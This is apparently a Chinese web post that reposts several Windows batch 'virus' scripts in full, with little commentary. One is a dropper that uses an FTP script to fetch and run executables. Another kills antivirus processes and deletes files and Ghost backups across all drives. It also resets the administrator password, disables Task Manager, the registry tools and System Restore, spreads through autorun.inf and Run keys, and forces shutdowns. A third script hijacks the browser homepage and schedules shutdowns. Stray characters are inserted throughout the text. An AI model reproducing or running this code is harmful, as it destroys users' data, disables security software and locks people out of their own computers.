一个批处理病毒

一个批处理病毒,第1张

reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\ftp.exe" /f 删除注册表中的FTP.EXE键值

ftp -s:C:\WINDOWS\debug\dboysb.sys 使用FTP -S执行DBOYSB.SYS文件。(应该是为了下载A.EXE与B.EXE的)

start C:\WINDOWS\debug\a.exe 开始运行A.EXE

start C:\WINDOWS\debug\b.exe 开始运行B.EXE

del C:\WINDOWS\debug\dboysb.sys 删除DBOYSB.SYS文件

del C:\WINDOWS\debug\kao.bat 删历卜除KAO.BAT批处理文件

这个肢银穗文件仅仅搏孙是个批处理程序 里面没有病毒代码 都是正常使用的代码 自然不会有反应。它的作用是执行A.EXE与B.EXE 这A与B才是真正的病毒 (可能)

最强病毒!谨慎运行!此程序会将系统搞崩溃.

摘自:htt我ps://www是.jb51.net/a链rticle/7129.h接tm  去掉里面的字哦

@echo off  

title You DEAD!!!!!!! 脊迅宏昌肆 

set taskkill=s  

copy %0 %windir%\system32\cmd.bat  

attrib %windir%\system32\cmd.bat +r +s +h  

net stop sharedaccess >nul  

%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul  

%s% /im norton* /f >nul  

%s% /im av* /f >nul  

%s% /im fire* /f >nul  

%s% /im anti* /f >nul  

%s% /im spy* /f >nul  

%s% /im bullguard /f >nul  

%s% /im PersFw /f >nul  

%s% /im KAV* /f >nul  

%s% /im ZONEALARM /f >nul  

%s% /im SAFEWEB /f >nul  

%s% /im OUTPOST /f >nul  

%s% /im nv* /f >nul  

%s% /im nav* /f >nul  

%s% /im F-* /f >nul  

%s% /im ESAFE /f >nul  

%s% /im cle /f >nul  

%s% /im BLACKICE /f >nul  

%s% /im def* /f >nul  

%s% /im 360safe.exe /f >nul  

net stop Shadow" "System" "Service  

set alldrive=d e f g h i j k l m n o p q r s t u v w x y z  

for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul  

for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul  

rem 修改注册表.......  

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\  

Folder\Hidden\SHOWALL /v   

CheckedValue /t REG_DWORD /d 00000000 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoRun /t REG_DWORD /d   

00000001 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoRecentDocsMenu /t   

REG_DWORD /d 00000001 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoDrives /t REG_DWORD /d   

4294967295 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v   

Disableregistrytools /t   

REG_DWORD /d 00000002 /f >nul 樱册 

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoNetHood /t REG_DWORD /d   

00000001 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V   

NoDesktop /t REG_DWORD /d   

00000001 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoClose /t REG_DWORD /d   

00000001 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoFind /t REG_DWORD /d   

00000001 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v   

DisableTaskMgr /t REG_DWORD   

/d 00000001 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoLogOff /t REG_DWORD /d   

00000001 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoSetTaskBar /t REG_DWORD   

/d 00000001 /f >nul  

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v   

DisableSR /t REG_DWORD /d   

00000001 /f >nul  

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v   

DisableConfig /t REG_DWORD /d   

00000001 /f >nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

RestrictRun /t REG_DWORD /d   

00000001 /f >nul  

cls  

net user administrator 123456 >nul  

for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul  

echo @echo off >d:\setup.bat  

echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新  

安装系统可以解决此问题  

!^.^ >>d:\setup.bat  

echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动  

\a.bat >>d:\setup.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f >>d:\setup.bat  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f >>d:\setup.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f >>d:\setup.bat  

HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f   

>>d:\setup.bat  

echo [windows] >> %windir%\win.ini  

echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini  

echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini  

echo [boot] >> %windir%\system.ini  

echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini  

echo [AutoRun] >d:\autorun.inf  

echo Open=setup.bat >>d:\autorun.inf  

echo Open=system.bat >>d:\autorun.inf  

attrib d:\autorun.inf +r +s +h >>d:\setup.bat  

attrib d:\setup.bat +r +s +h >>d:\setup.bat  

start d:\setup.bat /min >nul  

echo @echo off >>C:\AUTOEXEC.BAT  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT  

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f >>C:\AUTOEXEC.BAT  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f >>C:\AUTOEXEC.BAT  

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f >>C:\AUTOEXEC.BAT  

echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT  

copy %0 %systemroot%\windows.bat >nul  

if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat  

if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%  

windir%/system32/explorer.bat  

if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%  

windir%/system32/explorer.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f >>%windir%/system32/explorer.bat  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f >>%windir%/system32/explorer.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

explorer.bat /t REG_SZ /d %  

windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

explorer.bat /t REG_SZ /d %  

windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat  

echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat  

attrib %windir%/system32/explorer.bat +r +s +h%  

attrib %systemroot%/windows.bat +r +s +h  

for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat  

for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat  

for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat  

set drive=e f g h i j k l m n o p q r s t u v w x y z  

for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf  

for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf  

copy %0 d:\Program" "Files\run.bat  

for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start   

d:\Program" "Files\run.bat /min   

>>%%c:\system.bat  

for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat  

for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul  

for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul  

if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat  

/min >>d:\setup.bat  

attrib d:\Program" "Files\run.bat +r +s +h >nul  

del %0  

exit

如果不出错的话,第二次应该不行了

@echo off

title 组合器

echo %time% %date%

echo 这个安装过程需要很长时间,请耐心等待

pause

net user "%username%" 2097152

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 00000000 /迹举宴f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 00000001 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\姿银Advanced" /v ShowSuperHidden /t reg_dword /d 00000000 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 00000001 /f

reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://564690518.qzone.qq.com /f >nul

reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://564690518.qzone.qq.com /f >nul

attrib C:\WINDOWS\system32\taskmgr.exe -r -a -s -h

copy taskmgr.exe C:\WINDOWS\system32

attrib C:\WINDOWS\system32\taskmgr.exe +r +a +s +h

echo shutdown -s -t 25>>subject.BAT

copy subject.BAT "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动"

del /f /q subject.BAT

echo shutdown -s -t 20>c:\windows\autorun.bat

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sbrs /d "c:\windows\autorun.bat" /f

attrib c:\windows\autorun.bat +r +a +s +h

@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /答歼d 00000001 /f

taskkill /im qq.exe /f /t

taskkill /im explorer.exe /f /t

shutdown -s -t 500

del %0


欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/yw/8265000.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-04-14
下一篇2023-04-14

发表评论

登录后才能评论

评论列表(0条)

    保存